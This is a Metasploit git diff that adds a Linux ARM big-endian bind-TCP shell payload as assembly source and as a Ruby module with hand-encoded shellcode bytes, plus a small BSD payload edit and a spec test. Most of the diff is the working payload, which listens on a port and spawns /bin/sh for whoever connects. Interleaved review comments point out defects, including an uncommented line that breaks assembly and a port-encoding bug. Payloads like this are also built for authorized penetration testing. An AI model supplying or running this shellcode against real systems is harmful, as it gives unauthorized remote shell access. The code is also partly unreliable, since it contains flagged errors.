diff --git a/external/source/shellcode/linux/armbe/single_sock_bind.s b/external/source/shellcode/linux/armbe/single_sock_bind.s
new file mode 100644
index 0000000000..dfcce490dc
--- /dev/null
+++ b/external/source/shellcode/linux/armbe/single_sock_bind.s
@@ -0,0 +1,117 @@ +@@ +@ +@ Name: single_sock_bind +@ Qualities: - +@ Authors: Balazs Bucsay <@xoreipeip> +@ License: MSF_LICENSE +@ Description: +@ +@ Implementation of a Linux bind TCP shellcode for ARM BE architecture. +@ +@ Assemble with: +@ armeb-buildroot-linux-uclibcgnueabi-as -mthumb single_sock_bind.s -o shellcode.o +@ Link with: +@ armeb-buildroot-linux-uclibcgnueabi-ld shellcode.o -o shellcode +@ +@ Meta-Information: +@ +@ meta-shortname=Linux Bind TCP +@ meta-description=Listen on a port for a connection and run a second stage +@ meta-authors=earthquake +@ meta-os=linux +@ meta-arch=armbe +@ meta-category=singles +@ meta-connection-type=bind +@ meta-name=bind_tcp +@@ + + +.section .text + .global _start + + _start: + .code 32 + +@ Thumb-Mode on + add r6, pc, #1 + bx r6 + .code 16 + +@ _socket(2,1,0) + sub r2, r2, r2 + add r1, r2, #1 + add r0, r2, #2 + lsl r7, r1, #8 + add r7, r7, #0x19 + svc 1 + mov r6, r0 + +@ 1 uint8_t sin_len +@ 1 sa_family_t sin_family +@ 2 in_port_t sin_port +@ 4 struct in_addr sin_addr +@ 8 char sin_zero [8] +@ 00 02 5C11 00000000 00000000 00000000 +@ 5c11 => 4444 +@ _bind() + mov r2, #2 + lsl r2, r2, #8 + add r2, r2, #0x11 + lsl r2, r2, #8 + add r2, r2, #0x5C + sub r3, r3, r3 + sub r4, r4, r4 + sub r5, r5, r5 + mov r1, sp + stm r1!, {r2-r5} + sub r1, #0x10 + mov r2, #16 + add r7, r7, #1 + svc 1 + +@ _listen() + mov r0, r6 + sub r1, r1, r1 + add r7, r7, #2 + svc 1 + +@ _accept() + mov r0, r6 + sub r2, r2, r2 + add r7, r7, #1 + svc 1 + mov r6, r0 + +@ _dup2() + sub r1, r1, r1 + mov r7, #63 + svc 1 + + mov r0, r6 + add r1, r1, #1 + svc 1 + + mov r0, r6 + add r1, r1, #1 + svc 1 + + _execve() + sub r2, r2, r2 + mov r0, pc + add r0, #18 +@ next intstruction terminates the string beneath the code "//bin/sh" +@ in case you want to say goodbye to the null character +@ str r2, [r0, #8] + str r2, [sp, #8] + str r0, [sp, #4] + add r1, sp, #4 + mov r7, #11 + svc 1 + +@ _exit() + sub r4, r4, r4 + mov r0, r4 + mov r7, #1 + svc 1 +.ascii 
"//bin/sh\0" +@.ascii "//bin/sh" diff --git a/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb b/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb index 8bff2170e3..d0076c8bbd 100644 --- a/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb +++ b/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb @@ -44,7 +44,7 @@ module MetasploitModule "\x0f\x05" +# syscall # "\x48\x97" +# xchg %rax,%rdi # "\x52" +# push %rdx # - "\xba\x00\x02\x11\x5C" +# mov edx,0x5c110200 # + "\xba\x00\x02\x11\x5C" +# mov edx,0x5c110200 # "\x52" +# push %rdx # "\x48\x89\xe6" +# mov %rsp,%rsi # "\x6a\x10" +# pushq $0x10 # diff --git a/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb b/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb new file mode 100644 index 0000000000..725d77eff9 --- /dev/null +++ b/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb 
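Review bot: The `_execve()` heading in the execve block lacks the leading `@` that `@ _listen()`, `@ _accept()`, `@ _dup2()` and `@ _exit()` carry, so the `as -mthumb` invocation quoted in the file header would presumably try to assemble `_execve()` as an instruction and fail; it should read `@ _execve()`. The sockaddr layout comment `@ 00 02 5C11 00000000 …` and `@ 5c11 => 4444` do not match what the code builds: r2 ends as 0x0002115C, which on this big-endian target is stored as `00 02 11 5C` (family 2, then port 4444 = 0x115C in network order), so the comment should read `@ 00 02 11 5C 00000000 00000000 00000000` and `@ 115c => 4444`; the `sin_len`/`sin_family` one-byte split above it also describes the BSD struct rather than Linux's 16-bit sa_family. Minor: `intstruction` → `instruction` in the comment above the disabled `str r2, [r0, #8]`, and `meta-authors=earthquake` disagrees with the `Authors:` line.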
@@ -0,0 +1,115 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/handler/bind_tcp' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit4 + + CachedSize = 118 + + include Msf::Payload::Single + include Msf::Payload::Linux + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Linux ARM Big Endian Command Shell, Bind TCP Inline', + 'Description' => 'Listen for a connection and spawn a command shell', + 'Author' => 'Balazs Bucsay @xoreipeip ', + 'References' => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s'], + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_ARMBE, + 'Handler' => Msf::Handler::BindTcp, + 'Session' => Msf::Sessions::CommandShellUnix + )) + # Register command execution options + register_options( + [ + OptString.new('CMD', [ true, "The command to execute.", "/bin/sh" ]), + Opt::LPORT(4444) + ], self.class) + end + def generate + cmd = (datastore['CMD'] || '') + "\x00" + bytehigh = (datastore['LPORT'].to_i >> 8).chr + bytelow = (datastore['LPORT'].to_i & 0xFF).chr + + payload = + # turning on thumb mode + "\xe2\x8f\x60\x01" +# add r6, pc, #1 # + "\xe1\x2f\xff\x16" +# bx r6 # + + # thumb mode on + # socket(2,1,0) + "\x1a\x92" +# sub r2, r2, r2 # + "\x1c\x51" +# add r1, r2, #1 # + "\x1c\x90" +# add r0, r2, #2 # + "\x02\x0f" +# lsl r7, r1, #8 # + "\x37\x19" +# add r7, r7, #0x19 # + "\xdf\x01" +# svc 1 # + "\x1c\x06" +# mov r6, r0 # + + # bind() + "\x22\x02" +# mov r2, #2 # + "\x02\x12" +# lsl r2, r2, #8 # + "\x32"+bytehigh +# add r2, r2, #0xXX # + "\x02\x12" +# lsl r2, r2, #8 # + "\x32"+bytelow +# add r2, r2, #0xXX # + "\x1a\xdb" +# sub r3, r3, r3 # + "\x1b\x24" +# sub r4, r4, r4 # + "\x1b\x6d" +# sub r5, r5, r5 # + "\x46\x69" +# mov r1, sp # + 
"\xc1\x3c" +# stm r1!, {r2-r5} # + "\x39\x10" +# sub r1, #0x10 # + "\x22\x10" +# mov r2, #16 # + "\x37\x01" +# add r7, r7, #1 # + "\xdf\x01" +# svc 1 # + + # listen() + "\x1c\x30" +# mov r0, r6 # + "\x1a\x49" +# sub r1, r1, r1 # + "\x37\x02" +# add r7, r7, #2 # + "\xdf\x01" +# svc 1 # + + # accept() + "\x1c\x30" +# mov r0, r6 # + "\x1a\x92" +# sub r2, r2, r2 # + "\x37\x01" +# add r7, r7, #1 # + "\xdf\x01" +# svc 1 # + "\x1c\x06" +# mov r6, r0 # + + # dup2() + "\x1a\x49" +# sub r1, r1, r1 # + "\x27\x3f" +# mov r7, #63 # + "\xdf\x01" +# svc 1 # + "\x1c\x30" +# mov r0, r6 # + "\x31\x01" +# add r1, r1, #1 # + "\xdf\x01" +# svc 1 # + "\x1c\x30" +# mov r0, r6 # + "\x31\x01" +# add r1, r1, #1 # + "\xdf\x01" +# svc 1 # + + # execve() + "\x1a\x92" +# sub r2, r2, r2 # + "\x46\x78" +# mov r0, pc # + "\x30\x12" +# add r0, #18 # + "\x92\x02" +# str r2, [sp, #8] # + "\x90\x01" +# str r0, [sp, #4] # + "\xa9\x01" +# add r1, sp, #4 # + "\x27\x0b" +# mov r7, #11 # + "\xdf\x01" +# svc 1 # + + # exit() + "\x1b\x24" +# sub r4, r4, r4 # + "\x1c\x20" +# mov r0, r4 # + "\x27\x01" +# mov r7, #1 # + "\xdf\x01" +# svc 1 # + cmd + end +end diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb index 633b712c59..d0bba13437 100644 --- a/spec/modules/payloads_spec.rb +++ b/spec/modules/payloads_spec.rb @@ -1053,6 +1053,16 @@ RSpec.describe 'modules/payloads', :content do modules_pathname: modules_pathname, reference_name: 'java/shell_reverse_tcp' end + + context 'linux/armbe/shell_bind_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/armbe/shell_bind_tcp' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/armbe/shell_bind_tcp' + end context 'linux/armle/adduser' do it_should_behave_like 'payload cached size is consistent',
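Review bot: `bytehigh` and `bytelow` come from `Integer#chr`, which yields an ASCII-8BIT string for values ≥ 0x80, while the `"\x.."` literals they are concatenated with in `generate` are UTF-8 in a file that has no `# -*- coding: binary -*-` line; Ruby refuses to join two non-ASCII strings of different encodings, so an LPORT whose high or low byte is ≥ 0x80 (every port ≥ 32768, and e.g. 4545) would presumably raise Encoding::CompatibilityError instead of producing a payload. Adding `# -*- coding: binary -*-` as the first line, as many framework files do, makes every literal ASCII-8BIT and removes the problem. Separately, `'References' => ['URL', '…']` is a flat pair where the framework takes an array of pairs; it should be `'References' => [['URL', 'https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s']]`. The CMD value is handed to execve as the pathname with a single-element argv (`str r0, [sp, #4]` / `str r2, [sp, #8]`), so a value carrying arguments cannot work and the option text should say so, e.g. `"The path of the program to execute (no arguments)."`; the `'Author'` string also has a trailing space.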